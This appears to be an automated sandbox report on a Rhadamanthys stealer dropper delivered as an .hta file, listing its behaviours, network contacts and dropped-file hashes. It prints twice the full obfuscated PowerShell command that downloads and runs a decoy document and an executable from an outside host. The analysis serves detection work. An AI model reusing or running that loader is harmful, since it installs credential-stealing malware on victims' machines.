Malware Analysis Report

2024-11-30 02:18

Sample ID 241102-dc3w6axhrh
Target 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta
SHA256 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302
Tags
discovery execution rhadamanthys persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302

Threat Level: Known bad

The file 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta was found to be: Known bad.

Malicious Activity Summary

discovery execution rhadamanthys persistence stealer

Rhadamanthys

Rhadamanthys family

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Modifies Internet Explorer settings

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 02:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 02:52

Reported

2024-11-02 02:55

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

Network

Country Destination Domain Proto
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp

Files

memory/1848-2-0x0000000002F00000-0x0000000002F40000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-02 02:52

Reported

2024-11-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3648 created 2648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GifCamVideoEditor = "C:\\Users\\Admin\\Music\\GifCamUpdater\\GifCamOculus.exe" C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 944 set thread context of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\openwith.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1548 wrote to memory of 3488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1548 wrote to memory of 3488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""

C:\Users\Admin\AppData\Roaming\Xteam30.exe

"C:\Users\Admin\AppData\Roaming\Xteam30.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 218.176.139.118.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 136.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/1548-0-0x0000000071ACE000-0x0000000071ACF000-memory.dmp

memory/1548-1-0x00000000052C0000-0x00000000052F6000-memory.dmp

memory/1548-2-0x0000000071AC0000-0x0000000072270000-memory.dmp

memory/1548-4-0x0000000071AC0000-0x0000000072270000-memory.dmp

memory/1548-3-0x0000000005A30000-0x0000000006058000-memory.dmp

memory/1548-5-0x00000000059A0000-0x00000000059C2000-memory.dmp

memory/1548-7-0x0000000006270000-0x00000000062D6000-memory.dmp

memory/1548-6-0x0000000006190000-0x00000000061F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgd1behk.m4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1548-17-0x00000000063E0000-0x0000000006734000-memory.dmp

memory/1548-18-0x0000000006850000-0x000000000686E000-memory.dmp

memory/1548-19-0x00000000068A0000-0x00000000068EC000-memory.dmp

memory/1548-20-0x0000000007EA0000-0x000000000851A000-memory.dmp

memory/1548-21-0x0000000006E10000-0x0000000006E2A000-memory.dmp

memory/1548-23-0x0000000007D40000-0x0000000007DD6000-memory.dmp

memory/1548-24-0x0000000007CD0000-0x0000000007CF2000-memory.dmp

memory/1548-25-0x0000000008AD0000-0x0000000009074000-memory.dmp

memory/3488-29-0x00007FFB631B0000-0x00007FFB631C0000-memory.dmp

memory/3488-31-0x00007FFB631B0000-0x00007FFB631C0000-memory.dmp

memory/3488-30-0x00007FFB631B0000-0x00007FFB631C0000-memory.dmp

memory/3488-32-0x00007FFB631B0000-0x00007FFB631C0000-memory.dmp

memory/3488-33-0x00007FFB631B0000-0x00007FFB631C0000-memory.dmp

memory/3488-34-0x00007FFB60E50000-0x00007FFB60E60000-memory.dmp

memory/3488-35-0x00007FFB60E50000-0x00007FFB60E60000-memory.dmp

C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx

MD5 65d4be8afc700f773c79a0d89da13ec5
SHA1 f1bc5b54ee151155e8a85ca61ff1bea7295ee38d
SHA256 2189f8a864e30bf54fc7003c5d63ebfa143c6a07eca060638d30b0a473a97988
SHA512 25244cb6e322c39e7ef8bc1216280730be3927935a315174c1a75110257893f0d6ef41083e5409397396d8974c2fd2caf7003a20ff91de5c6462394d992e3a87

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 688a9dd38edb9f52f60fcb2e19c06969
SHA1 f8af4a9bb71dc47f3d5fda352e2e1f2106eb59a8
SHA256 9f841d9d87b55c79f79ac1abbf06d2e94713be06965c85c0f9fbc3f83d6536e5
SHA512 bfd5f29dc546efdb7a405f5aaffb98a05ec42c33644cfef98d8a21422ecb714bafb9c1de57e3fb25f5daf56665b24e48ab1578e6f185d3458b709b11b7c8c6e0

memory/1548-62-0x0000000071ACE000-0x0000000071ACF000-memory.dmp

memory/1548-63-0x0000000071AC0000-0x0000000072270000-memory.dmp

memory/1548-64-0x0000000071AC0000-0x0000000072270000-memory.dmp

C:\Users\Admin\AppData\Roaming\Xteam30.exe

MD5 421700a2d6d8516013d87e04628d2802
SHA1 f738ae62f1016c0667115665c42e71d85cfb4d38
SHA256 cc00a259ec4ebde015fe0fad59f369ae23def081caa787ad0652f7d6b2fe6de0
SHA512 c411036515d4046ba62370c2f27e32d414273dc2e4004b9c4396c3518f951ef97c717ab532dd52100f2950e137249462495b376b8d89adde4c3f89292e9f70e6

memory/1548-78-0x0000000071AC0000-0x0000000072270000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 62ba8b165930dce4bb07a8e20c42712d
SHA1 0fcf5006634a6972a992d0405fa7906f8fb13146
SHA256 3e9c12c29ff3609743fad39a6ff021faa20c293789762115c04795d451ff636f
SHA512 084d12180a08bf1d251fbd1614deeaad74160d88a0bfb5f1ca16caca33bef4fa322b19f4202b286653804cbdacb0e78c43b85e548da541b290e5a1a0708ac6f5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 7f6ccdc9dd29daacb943094125a930c7
SHA1 19b6ccaef0ecd2eed6f2a563f81ee415d1750780
SHA256 bcce5f2390b586bb54c14af5f45fc5a22ad44ba29cd3438191e393afbfdc7455
SHA512 5692482c22f59c6c2fe27d8dbcdda21d74d1bd73c6a89314db55153a564fed02a42047e81b8d6a9f05ca700affbee326c9bcb576c84940f5809756408921d534

C:\Users\Admin\AppData\Local\Temp\TCDD9C2.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

memory/944-535-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-572-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-574-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-573-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-575-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-577-0x0000000000400000-0x0000000000887000-memory.dmp

memory/944-578-0x0000000000400000-0x0000000000887000-memory.dmp

memory/3648-576-0x0000000000CF0000-0x0000000000DA0000-memory.dmp

memory/3648-579-0x0000000005850000-0x00000000058E2000-memory.dmp

memory/3648-580-0x0000000002FE0000-0x0000000002FE8000-memory.dmp

memory/3648-581-0x0000000002FF0000-0x0000000003000000-memory.dmp

memory/3648-582-0x0000000005B30000-0x0000000005F30000-memory.dmp

memory/3648-583-0x0000000005B30000-0x0000000005F30000-memory.dmp

memory/3648-584-0x00007FFBA3130000-0x00007FFBA3325000-memory.dmp

memory/3656-587-0x0000000000CF0000-0x0000000000CF9000-memory.dmp

memory/3648-586-0x0000000075B70000-0x0000000075D85000-memory.dmp

memory/3656-590-0x0000000002920000-0x0000000002D20000-memory.dmp

memory/3656-593-0x0000000075B70000-0x0000000075D85000-memory.dmp

memory/3656-591-0x00007FFBA3130000-0x00007FFBA3325000-memory.dmp